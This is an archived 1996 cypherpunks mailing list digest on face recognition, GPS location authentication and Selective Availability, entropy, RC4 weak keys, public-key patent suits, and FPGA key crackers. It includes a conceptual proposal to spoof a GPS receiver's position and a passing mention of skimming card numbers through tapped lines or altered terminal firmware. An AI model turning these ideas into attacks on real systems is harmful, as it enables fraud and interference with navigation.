Date: Sat, 13 Apr 1996 06:27:38 +0800
To: cypherpunks@toad.com
Subject: Re: On computer face recognition:
Message-ID: <ad931b9413021004c822@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:14 PM 4/11/96, David Loysen wrote:

>Take a peak at http://www.neci.nj.nec.com/homepages/lawrence/papers. One of
>Lawences papers is on using Neural networks to recognize faces. Methinks
>that the state of the art is advancing rapidly and such problems as not
>looking at the camera or changing your expression are rapidly being overcome.

One system I read up on a few years ago relied heavily on ear shape....it
seems that the profile of ears varies tremendously and ear profiles are
fairly easy to get a kind of hash of, assuming the ear profile is not
obstructed by hair.

"Get a haircut" may once again return to favor.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Batman <batman@infomaniak.ch>
Date: Fri, 12 Apr 1996 23:13:11 +0800
To: "cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BB27EB.655CD0C0@ppp4.infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain


Please PUT me OUT of YOUR cypherpunks AND other MAIL-LISTS

Thankx






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 06:48:30 +0800
To: cypherpunks@toad.com
Subject: Re: On computer face recognition:
Message-ID: <ad931cb2140210040b59@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:48 PM 4/11/96, Alan Horowitz wrote:
>How do _people_ recognize faces?

Still an open question, last I heard.

It may be unknowable, at least in a formal sense. That is, we know that
babies can recognize the faces of their mothers in fractions of a second
(no, I don't have a reference for this, but I remember the number from my
days as an AI person at Intel). There may be no simple description that is
used, such as angles between eye line and mouth, convexity of chin,
whatever. What is important is that face recognition happens in about
30-100 "cycles" of the brain, implying massive parallelism (hardly
surprising). There are, of course, very few recognition algorithms that run
on conventional computer architecures in so few cycles.

By "unknowable" I don't mean "supernatural," merely not practically
describable as an algorithm runnable on conventional von Neumann-type
machines. "Neural net" is the buzzword usually associated with this.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 13 Apr 1996 04:55:16 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are. (fwd)
Message-ID: <199604120214.VAA13727@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> GPS works by measuring the differing distances to a number of satellites.

Actualy, it measures doppler shift as well.

> It might be possible to seperately record the signals from several
> different satellites, delay them each just the right amount of time, and
> then recombine them to simulate being at another nearby location (within
> several hundred miles). However, this might not be possible. Examine the
> following quote from Denning's paper:

Seems to me that standard satellite tracking software would work just fine
for this once the correct orbital parameters were included. To get the
necessary orbital parameters look on sci.space.news and they are announced
regularly.

> :The location signature is virtually impossible to forge at the
> :required accuracy.

If you can measure the accuracy you can spoof it. It is only a question of
cost at that point.

> :orbit perturbations, which are unknowable in real-time, and intentional
> :signal instabilities  (dithering) imposed by the U.S. Department of Defense
> :selective availability (SA) security policy.

Which are going to be turned off. I have to draw exception to the
'dithering' in regard to the lsb's of the data. They are actualy encrypted.
It is not random which is what 'signal instability' implies. Were it random
then a 'flying capacitor' type filter or a digital filter could get the bits
out. I have two years of experience using such 'flying capacitor' type
filters in LORAN-C equipment I calibrated and repaired for Austron. The
signal on LORAN is a damped sinusoid, very precisely damped. The timing
sequence of sites are drawn on maps as well as published in book and
electronic form. You set the filter for the same repeat rate as the signal
you wish to detect. As the signal is fed over and over into the bank of
capacitors the random noise cancels out and you are left with a remarkably
clean signal. You then feed this to a 2055 microstepper (nS/S) and compare
it to a time reference standard (1210 Time reference standard, my
specialty). When the signals cancel you can get a very accurate reading and
change that to lat/long quite easily. I would regularly sync the 1210's to
USNO and the NIST to measure the oven heated crystal oscillators drift in
frequency over time. By applying a voltage to the circuit you can compensate
for this drift using a 2055 microstepper (a time delay unit). At that time we
were making both the 2000 and 5000 series receivers. The 68000 based machine
was due out when I left for a job at UT Austin. The neatest part of the job
was flying cesium beams around the world and measuring their drift to
accurately measure the rotation rate of the Earth.

You can defeat even the encryption if you take a long enough time to
interpolate. The reason it isn't done is that by the time you get the fix the
target you were going to shoot your missile at is gone. If it is so large (a
city) or slow (grunts) that it won't move significantly in that time you
don't need that accuracy in the first place. I base this on a years worth of
technical support I did for CompuAdd for Desert Shield/Storm. I handled
several problems related to MLRS and Naval systems related to target
selection and tracking & GPS in regards our computers.

> It's possible that the orbit perturbations may be enough to screw up an
> attempt to forge a signal

Which would be enough to scramble the signal as well. As a matter of fact
this might create another means of attack. Namely that the orbit varies is a
given. That the orbit can be predicted to quite good accuracy in less than
real-time is a given. By comparing these to the actual orbit it might be
possible to creat a situation where a fake signal was more accurate than the
real signal making the receiver filter the real signal as noise. The one
drawback here is that it would require considerable power to effectively
impliment the masking.

; the variations in signal timings won't provide
> enough information to an attacker to be able to accurately replicate what
> the signal would look like at another location.

The doppler shift directly corresponds to altitude. If you have the normal
orbital parameters it is a relatively simple matter to use a computer to
predict where it will be in the near future (5 minutes). NASA and United
States Space Command (USSC) regularly track over 8,000 items in orbit. Some
as small as bolts. Tracking accuracy is a well understood problem.

> It remains to be seen
> whether it is reliably possible for the secure host, at its location, to
> distinguish between an accurate signature and an inaccurate but plausible
> forged signature.

Anybody got a GPS receiver in Austin? I believe I can arrange the necessary
equipment and support to attempt it. I know several EE's as well as
somebody with commercial radio service equipment I am shure some of the
other local cpunks might want to help as well. I propose that what be
attempted is making a GPS receiver believe it is 100 miles from where it
actually is.

I will forward a copy of this to the Experimental Science Instrumentation
mailing list (tesla@ssz.com) to see if anyone on there might be interested.


                                                   Jim Choate

                                                   CyberTects
                                                   ravage@ssz.com

                                                   Tivoli - IBM
                                                   jchoate@tivoli.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Fri, 12 Apr 1996 23:46:48 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u7BgI-00091BC@pacifier.com>
Message-ID: <199604120217.VAA03048@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> jim bell writes:

jb> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
>> No, bytes are no always 8 bits - some machines use(d) 9-bit bytes.

jb> I notice you gave no examples.  Why is that?

	As I recall, the Honeywell H6000 used 6-bit bytes and 36-bit
(6 byte) words.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
ObCDABait:      For she doted upon their paramours, whose flesh is as the
flesh of asses, and whose issue is like the issue of horses.  [Eze 23:20]
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 13 Apr 1996 23:13:31 +0800
To: "Powers Glenn" <cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <m0u7aOu-0008y4C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:48 PM 4/11/96 GMT+01DST, Powers Glenn wrote:
>- It's called "S/A" (Selective Availability) which is the NWO term for adding 
>- errors that "authorized" users can remove. (Not to be confused with A/S, or 
>- anti-spoofing)   It was originally intended to be turned on in wartime to 
>- deny the enemy accurate fixes, but during the Gulf War military GPS 
>- receivers were so scarce that the soldiers had to use commercial products, 
>- so the S/A actually was turned OFF then!
>- 
>- Since then, pressure has been building to turn off S/A, since its 
usefulness 
>- is nearly zero.  Even so, the amplitude of S/A errors are only a little 
>- larger than natural errors caused by satellite timing errors, atmospheric 
>- propagation variations, etc.  The result is that DGPS is useful, which is 
>- (more or less) a fixed antenna and GPS system which knows where it is, and 
>- subtracts where it "seems" to be by GPS every second, and broadcasts the 
>- resulting error data on some terrestrial system to receivers locally.  The 
>- result is errors down to the 1-meter level and even lower.  That system 
>- compensates for both natural errors and S/A, so the whole purpose of having 
>- S/A is negated.  Eventually S/A will probably be turned off permanently, 
but 
>- even then we'll want to continue to use DGPS systems.
>
>    Close, but not quite:
>S/A is an ADJUSTABLE variable, not on/off. 

Huh?  You sound like you're trying to correct me, but you're not.  I'm 
already aware that the magnitude of S/A is adjustable; nothing I've said 
above contradicts this.

>it can reduce accuracy to 10 meters or 100 meters or whatever. 

For ordinary C/A code (the kind civilians are allowed to use) it can't 
"reduce accuracy to 10 meters."  The minimal error in C/A mode is based on 
atmospheric propagation and other errors.  Adjusting S/A down or off can 
eliminate the ADDED error, not reduce it below C/A's normal minimum RMS value.

>It's a DoD term, not NWO term.

I was being a bit facetious.  Nevertheless, my implication was correct:  The 
term is "selective availability" and it was specifically chosen to sound 
"positive" rather than "negative."  (I can't tell you exactly which issue of 
GPS World magazine mentioned this, but I've read every copy since it was 
started a few years ago.  It was probably in this magazine.  It would have 
been more accurate, I suppose, to call this "Newspeak.")

>    The "this is where you really are" percision location (forgot 
>the designation off hand) is ENCRYPTED (yes, there is crypto 
>revelance here...) in the data stream from the satellites.

It's called "PPS," for "Precise positioning Service."  Check the most recent 
issue of GPS World for an article on making that even more accurate.  
Nevertheless, even PPS is only accurate to about +/- 2 meters; DGPS is 
easily accurate to 1 meter, and I've seen ads that talk about 0.15 meter 
accuracy with differential GPS in C/A mode.

> The difference S/A makes is on the order of magnitude, therefore not 
>"useless." 

That depends on what you compare it to.  If you compare it to 
non-differential, C/A code signal, it turns +/- 25 meter (approx, of course) 
errors to upwards of +/- 100 meter errors, although as I understand it S/A 
is normally toned down to about +/- 50 meters.  BTW, I don't doubt that DoD 
has the technical ability to increase S/A even beyond +/- 100 meters, but 
that would be a pointless exercise.  It would also strongly piss off the 
average civilian GPS user, and since by far the largest number of GPS users 
are now civilian (and this number is growing rapidly) the DoD knows which 
side of its bread is buttered.

And using DGPS, the effect of S/A is essentially nil, since both it and most 
"natural" (unintentional) errors are cancelled out.  

So, what part of "useless" do you not understand?  

Please note that I didn't say it had no effect, merely that it was 
"useless."  As in, no militarily significant effect.    If you still 
disagree, please formulate a plausible (and, ideally, a PROBABLE) scenario 
under which the presence of S/A achieves a military benefit based on a 
rational view of whichever "enemy" you choose.  Since DGPS receivers are 
available for well under $1000, you're going to have to hypothesize a 
poverty-stricken enemy indeed. 

>It should be pointed out that different regions of the 
>earth can have different degrees of accuracy based on the S/A system.
>    I doubt S/A will ever be turned off, but this is my opinion.

Just a couple of days ago, I saw a note HERE reporting that Clinton had 
backed down (his normal behavior, interestingly!) and had decided to turn 
off S/A.  I haven't seen any confirmation of this claim, but then I haven't 
looked either.  If that report was correct, your opinion is already wrong.

I am fully aware that it could later be turned back on, if there was a 
genuine reason to do so.  This would be in line with the original intent 
behind S/A, to turn it on only when there was some real reasons to do so.  
Why they did not adopt this planned mode years ago, I don't know.  

>I know Jim's opinion. Discussion of this point is pointless.

In other words, "Don't confuse me with the facts."

>    DGPS transmission are made from a multiple single points, which 
>(to the best of my knowledge) are not networked.
>    glenn

That's only partially true.  There is nothing to prevent the world-wide 
distribution of a data stream which represents the complete differential 
correction data for GPS, broadcast from multiple locations  by FM 
subcarrier, idle cell-phone site, HF, pager channels, or 
other.   In fact, it has been argued that it should be transmitted, in the 
band of the GPS signals(so that a separate differential antenna is not 
required), from satellites, with the receivers built into GPS units, so that 
it would be available to everyone no matter where he is.  The attraction of 
this system, from a government/military standpoint, is that it would tend to 
foster dependance on this correction system by the average GPS user, and 
would tend to deter development of DGPS stations independent of the 
government.  That means that the government would actually be able to keep 
the "S/A advantage":  When it wants accuracies to be degraded, they will be. 
 Its current policy, however, practically guarantees that DGPS stations will 
be broadcasting in every major population center within just a few years.

Isn't it a good thing that government is so (CDA alert!) fucking stupid?

Jim "He only talks about one subject" Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 07:23:34 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <ad931eee1502100491ce@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 AM 4/11/96, jamesd@echeque.com wrote:
>At 10:36 PM 4/9/96 -0400, JonWienke@aol.com wrote:
>> Would anyone like to propose a means of measuring entropy that we can all
>> agree on?  I haven't seen anything yet that everyone likes.
>
>Nor will you:  To measure entropy is a deep unsolved philosophical
>and physical problem.

Indeed.

That there can be no simple definition of entropy, or randomness, for an
arbitrary set of things, is essentially equivalent to Godel's Theorem.

(To forestall charges that I am relying on an all-too-common form of
bullshitting, by referring to Godel, what I mean is that "randomness" is
best defined in terms of algorithmic information theory, a la Kolmogorov
and Chaitin, and explored in Li and Vitanyi's excellent textbook,
"Algorithmic Information Theory and its Applications.")

Think of it this way: when can a set of things, a string, etc., be
_compressed_. Answer: whenever a compression is found. Most things have no
real compressions, that is, they have no shorter description than
themselves. But they _might_ have a shorter description, a compression, and
we can never say for sure that they do not. Thus, even a set which we think
is of "high entropy" (roughly, "high randomness" or "no order" or "not
compressible") may actually have some hidden order, or compressibility, not
apparent at first glance.

That we can never know when we have achieved maximum compression is a
profound result of modern mathematics and information theory.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sat, 13 Apr 1996 00:53:16 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604111437.HAA05376@jobe.shell.portal.com>
Message-ID: <9604120126.AA1569@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Hal  <hfinney@shell.portal.com> writes:

  > Note however that Denning did not mention the Internet in her
  > spiel.

Well, assuming that she wrote *any* of the spiel, she does:

 "Where it works

  ... Location-based
  authentication could facilitate telecommuting by countering the
  vulnerabilities associated with remote access over dial-in lines and
  Internet connections..."

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon)
Date: Sun, 14 Apr 1996 00:06:26 +0800
To: cypherpunks@toad.com
Subject: Know Your Net.Enemies Project [noise]
Message-ID: <9604120236.AA18762@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> ambiguously wrote:

>definitely be added. I'll write the FUCKING STATIST section.

Do you use 'FUCKIN' as an adjective or as an active verb? :)

Sorry, couldn't resist :->

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 12 Apr 1996 23:15:04 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <olPI84q00YUuIE=vI9@andrew.cmu.edu>
Message-ID: <199604120258.VAA05545@homeport.org>
MIME-Version: 1.0
Content-Type: text



"MinTruth Personnel Office"


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 13 Apr 1996 02:46:39 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: No matter where you go, there they are.
In-Reply-To: <v02140b02ad91db64cd39@[205.162.51.35]>
Message-ID: <199604120314.WAA05634@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:

| And perhaps more importantly, do you really want anyone you connect to
| on the net to know your location to the nearest 10 meters?  What is
| Dennings fascination with building Big Brother?

	She read Snow Crash, and it scared her.

	This is flippiant, but I believe it comes close to the truth,
in that tends to provide a cogent explanation for her political
actions, as I've observed.  (Dorothy-- Since someone will forward this
to you, I'd be fascinated to hear your reactions in public or
private.)

	Snow Crash is a book about a future in which governments are
ineffective.  Companies run things, and have complete local control.
The world has gone to hell, and as a result, life is nasty, poor,
brutish and short.  Many people do not look forward to this world.
Thats an understandable reaction; when I first heard about anonymous
assasination markets, I thought it was pretty bizzare as a world to
look forward to.

	Then I heard Neal Stephenson speak.  And he brought up a very
good point, which was Hitler killed more people than Charles Manson
because Hitler had a big country, and its large army.  I look
forward to smaller, weaker government that can't put the Japs in
holding camps, surround and harras the Branch Davidians, etc.

	The debate, really, boils down to Hobbes v. Locke, or Plato v.
Aristotle.  Its not going to be resolved anytime soon by a
philosopher.  Many of us have read Mill, Hayek, Freidman, Nozick, and
decided that we prefer that world view.  That Dr. Denning has decided
that she likes Philosopher-Kings is not particularly unusual, except
in the computer business.  Go read Leviathan.  Think about what we're
talking about here.

	Its a scary new world that I expect will be created, by the
UNSTOPPABLE advance of technology.  There is no weapon created that is
not used by someone who judges the cause to be worthwhile.  Nukes,
chemicals, and biologicals have all been used against civilian
populations.  I judge that stopping the advance of cryptoanarchist
technology will fail (in the long run), and not be worth the price.  I
suspect Dorothy disagrees, and there lies her fascination with
building in Big Brother.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 12 Apr 1996 15:26:01 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [reputationpunks] Article on Moody's
In-Reply-To: <Pine.3.89.9604091832.A19718-0100000@tesla.cc.uottawa.ca>
Message-ID: <199604120346.WAA05808@homeport.org>
MIME-Version: 1.0
Content-Type: text


s1113645@tesla.cc.uottawa.ca wrote:

| This week's Economist has a nice tidbit on bond rating agencies and 
| antitrust on page 80. A comment on firms that trade mostly on their reps.
| Is an unsolicited rating by a for-profit agency an act of free speach
| or an act of defamation?

	It seems that Moody has gotten greedy, and is asking for money
for unsolicited services, with a carefully worded non-threat.

	To my mind, unsolicited work is just that.  Its something many
of us do from time to time, with no expectation of being paid.
Usually we don't spend months on a project that won't be satisfying
without a contract.

	To do work and then bill for it without a handshake strikes me
as bogus.  I wouldn't do it myself, and I have no respect for Moody's,
who seems to be doing it.

	I trust Morningstar more because they bill me for the
information they give me.  They have no relationship with the
evaluated.  A much better model.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Apr 1996 20:41:41 +0800
To: pmacdorn@isrinc.com
Subject: Re: GPS-based authentication
Message-ID: <m0u7bv8-0008ykC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 4/11/96 -6, Peter Trei wrote:
>I've read with interest your proposed GPS-based authentication 
>mechanism (it was posted to the cypherpunks mailing list). Can you
>confirm that you wrote this? Some people on the list think it may be
>a forgery.
[deleted]

>You say:
>" The signature ... is formed from bandwidth compressed raw 
>observations of all the GPS satellites in view."
>
>" The location signature is virtually impossible to forge at the required 
>accuracy. This is because the GPS observations at any given time are 
>essentially unpredictable to high precision due to subtle satellite orbit 
>perturbations, which are unknowable in real-time, and intentional 
>signal instabilities  (dithering) imposed by the U.S. Department of 
>Defense selective availability (SA)."

I think that Denning's paragraph is misleading.  S/A is stated; what I think 
they probably mean is closer to A/S, the anti-spoofing signal.  The S/A 
error is small and changes only slowly, the A/S signal is far faster and 
could hold the data to implement the signatures.  Even so, I think it would 
be comparatively easy to fake a signal if you are in view of most of the 
satellites in the area you wish to fake; attempting to fake something around 
the world would be harder.  

Aside from the technical difficulties associated with this  system (everyone 
has to have a GPS receiver, for instance) there is an obvious political 
problem associated with trusting the government.  After all, only its agents 
are supposed to know the dithering code which will be transmitted by the GPS 
satellite; its agents would presumably be able to fake their location since 
they can anticipate the data being transmitted.

Which raises an interesting issue, I think:  Would it be possible to remove 
the ability of the government to fake these signals, even if the rest of the 
system worked?  The goal would be to prevent anybody (including the 
operators of the GPS system) from being able to anticipate the dithering 
codes the GPS satellites would send.  One way to do that is to combine 
multiple random/pseudorandom bit streams (from hundreds, thousands, or maybe 
even millions of independent sources, perhaps you and me) into an overall 
stream, in such a way (XOR) that no data contributor could know how the 
result came out until he saw it.  Each contributor would be able to verify, 
however, that his data stream was used to form the eventual bit stream, and 
he is confident of the randomness of the system he uses to generate that 
stream.  (If he isn't, he should just change systems, or add another system 
to his equipment and XOR the results before he sends them off, crypted, to 
the central data combiner.)  Release of the decrypt keys could be delayed 
"just long enough" to prevent faking.

BTW, I'm not endorsing the underlying idea.  I think it's a leap backwards 
for freedom.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 13 Apr 1996 21:14:08 +0800
To: cypherpunks@toad.com
Subject: Re: RC4 improvement idea
Message-ID: <199604120717.AAA17361@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


<jamesd@echeque.com> wrote:
> > Such keys are not weak.

At 02:57 AM 4/9/96 -0700, David Wagner wrote:
> No, the report was right: the weak keys are real.
>
> For one key in 256, you have a 13.6% chance of recovering 16 bits of
> the original key.
>
> On average, the work factor per key recovered is reduced by a factor
> of 35 (i.e. the effective keylength is reduced by 5.1 bits) by using
> this class of weak keys.

Why do you not just assume the last byte of the key is 0x4A

Then for one key in 256 the effective keylength is reduced by a
whole 8 bits instead of a measly 5.1 bits.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Fri, 12 Apr 1996 21:01:36 +0800
To: cypherpunks@toad.com
Subject: Re: On computer face recognition:
Message-ID: <199604120630.XAA14255@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


There was a piece, I _think_ in Scientific American, tho it might have been
an AI journal, on face recognition by use of neural nets together with what
were called "eigenface" images: 
These eigenfaces each have specific characteristics, which when combined
together can closely approximate a specific face image.  The target face was
analyzed in terms of closeness-of-match to a small set of eigenfaces, on the
order of 5 to 8, I think.  Results of course were promising (else why write
about it, eh?) if not excellent.

At 12:14 PM 4/11/96 -0700, you wrote:
>At 10:02 PM 4/10/96 -0700, you wrote:
>>
>>On computer face recognition:
>>
>>
>>>> Shaving probably will not be a problem, but holding your head at a
>>>> slightly different angle...  will screw up the system totally,
>>>> unless the system has radically improved since the last time I read
>>>> up on it.
>>
>>At 11:45 AM 4/9/96 -0500, K00l Secrets wrote:
>>> Well, the systems I have seen are quite good at finding people's eyes.
>>> Scaling (for distance), and rotation (for the angle of your head)
>>> therefore don't really confuse the system once it has your eyes.
>>
>>Finding the eyes can only control for rotations in the plane of 
>>the image, when you tilt your head to one side.  They cannot 
>>handle the much more common case of 3D rotations, where you 
>>look slightly to the right or slightly to the left of camera.
>>Facial expressions also throw them badly.
>>
>
>Take a peak at http://www.neci.nj.nec.com/homepages/lawrence/papers. One of
>Lawences papers is on using Neural networks to recognize faces. Methinks
>that the state of the art is advancing rapidly and such problems as not
>looking at the camera or changing your expression are rapidly being overcome.
>
>
>=====================================
>dwl@hnc.com
>
>Zippity do da, zippity ah, my oh my what a wonderful day.
>Ya right, and hear I am without time to finish a cup of coffee.
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Fri, 12 Apr 1996 21:18:57 +0800
To: cypherpunks@toad.com
Subject: Pub Key patent update
Message-ID: <rschlafly1030647070>
MIME-Version: 1.0
Content-Type: text/plain



The battle over the public key patents continues, with no end in sight.
Recent events:

* Cylink tried to get a preliminary injunction against RSADSI shipping
BSAFE for contributory infringement of the Stanford patents.  The judge
denied it, saying there was doubt about the validity of Diffie-Hellman
and about the scope of Hellman-Merkle.

* Cylink is appealing the preliminary injunction denial to the Federal
Circuit.

* Cylink's lawsuit to break the MIT RSA patent on obviousness and other
grounds is scheduled to goto trial on July 9 before an LA judge.  I don't
know where the trial will be held.

* RSADSI had a license to the Stanford patents dating back to around
1987, and it argues that it covers BSAFE customers.  Cylink recently
demanded a 5% royalty, and when RSADSI refused, Cylink unilaterally
terminated the license.  Cylink is now adding a direct infringement
claim against RSADSI.

* RSADSI and PKP motions for dismissal of my charges have left most
of them intact.  In particular, the antitrust charge is still alive.

* My motion for summary judgment on the invalidity of the patents is
technically still pending, but the judge shows no sign of ruling
anytime soon.  If my arguments were either clearly correct or clearly
incorrect, he would have ruled by now.  I cannot predict what will happen.

* Trial on the Stanford patents is likely this summer.  RSADSI is
trying to postpone it.

Roger Schlafly

	phone: 408-476-3550
	CompuServe: 76646,323
	US Mail: PO Box 1680, Soquel, CA 95073 USA
	Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sun, 14 Apr 1996 00:03:13 +0800
To: cypherpunks@toad.com
Subject: Re: Bank transactions on Internet
Message-ID: <9604120417.AA22212@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>>>> "Dave Emery" <die@pig.die.com> pessimised:
> 
>   > [... the tools are too expensive...]
>   > [... and the skills required are too high...]
>   > [... for anyone on cypherpunks...]
> 
> Come on, Dave, this isn't alt.2600!  
> 

	I want to immediately applogize to the list readership if
anything in my posting seems to imply that I doubted that some of the
list members possess the skills or brainpower to build a key cracker. I
am sure a considerable number (at least by comparison with most other
net communities) do, and many more certainly have the raw brainpower to
learn the required technology if not currently up on it. Motivation and
available time are another matter however.

	My only disparaging comment (at least as intended by me) was that
the task was probably beyond some of the alt.2600 type crackers who
primarily use canned programs and scripts to perpetrate their attacks. 
That comment was actually intended as a left handed warning about the
advisablity of releasing a readily reproduced hardware key cracker
design to the world at large.  This seems especially true if entire FPGA
array PC plugin boards are becoming a commodity item and readily
available and the cracker recipe is buy one of those and install this canned
software on it.

	

> Most of the subscribers to this list are professionals -- engineers,
> programmers, mathematicians, lawyers -- not phone phreaks.  I'm sure
> that there are more than a few of us with the knowledge, experience,
> and free access to the resources needed to handle most relatively
> small-scale designs like this.
> 
> (It's like saying that no one on cypherpunks has access to the
> distributed computing resources necessary to perform other sorts of
> brute-force cracking -- which is patently ludicrous.)
> 

	I'm sorry, but rereading my post I simply don't find the
statement that cypherpunks readers couldn't carry out the task, My
comments were directed at the original cost and effort estimates that I
thought were a little low - I'm certainly aware that many cypherpunks
list members are working professionals or grad students/researchers with
very considerable "free" resources at their beck and call. And even the 
pessimistic resource estimate I posted is not beyond motivated people.
particularly if they see a large profit or advantage in it.

	But most importantly I may be making a very nieve assumption
about the list readership - that it is mostly good guys and not thieves
preparing to rip off hundreds or thousands of credit card numbers/ bank
access codes from the Internet for gain.  It is the implication that for
this thief group  it would be an easy $400 project to *design* and build
a useful key cracker that I was challenging. (I might add that there
certainly are other easier ways of obtaining large numbers of credit
card numbers and access codes by such means as tapping unencrypted
non-Internet data or voice communications and/or altering existing
credit card terminal firmware to make it save up and deliver credit card
numbers via a backdoor or bugging device.  Gaining illegal access to the
phone cables or credit terminals at a mall is certainly easier for most
crackers and more typical of their experiance base than designing
efficient pipelined key schedulers that fit into an FPGA).   

	Presumably most of the competant, talented cypherpunks who could
easily design a cracker are already far too well paid for these design
skills to have much of any motivation to build such hardware for
criminal purposes.

	And I might add that to my knowlage (admitedly rather limited) I
know of no hardware crackers having been built with this technology (at
least outside of the classified world).  If it really is a simple
trivial project that can be carried out with $400 worth of resources why
aren't there NYT front page articles about someone having built a useful
one and cracked something ?  There certainly are lots of ambitious young
grad students with lots of resources available to them and time to do
this who would love to make their reputation by being the first to crack
DES in under a week ...


> For instance, from where I'm sitting in my *home* office, I can see
> the full development packages for Xilinx and AT&T FPGAs, Viewlogic
> VHDL, schematic, and simulation tools, an HP 1660A logic analyser, and
> a Tek THS 720 500 MHz digital scope.
> 
	You have better tools than I do (I have a 16500B for example
rather than a 1660A (which I'd love), but not hugely so, and I've been
mostly semi-retired, taking a sabbatical to care for my newborn son and
haven't wanted to spend the money to update resources I'd be largely
using occasionally for very casual playing.

> And I doubt if I'm the only one here who does this for a living.
> 
	Judging from other posts I've seen I have little doubt.
Certainly I have done related stuff in the past...

> The problem isn't resources, but time and motivation -- what sort of
